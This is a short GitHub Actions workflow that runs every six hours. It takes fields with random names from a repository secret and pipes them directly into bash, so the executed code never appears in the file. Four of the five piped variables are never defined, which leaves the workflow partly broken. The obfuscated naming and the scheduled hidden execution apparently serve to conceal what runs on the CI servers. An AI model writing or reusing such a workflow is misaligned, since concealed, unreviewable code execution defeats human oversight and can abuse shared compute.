name: dengshiyu3340

on:
  workflow_dispatch:
  schedule:
    - cron: '59 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dengshiyu3340
        env:
          hs16: ${{ secrets.hs16 }}
        run: |
          echo $hs16 | jq -r .fnu329 | /bin/bash
          echo $ogep73204 | jq -r .b92926 | /bin/bash
          echo $o24849 | jq -r .h991 | /bin/bash
          echo $cw08 | jq -r .mix84160 | /bin/bash
          echo $eynkk24179 | jq -r .eusll3 | /bin/bash

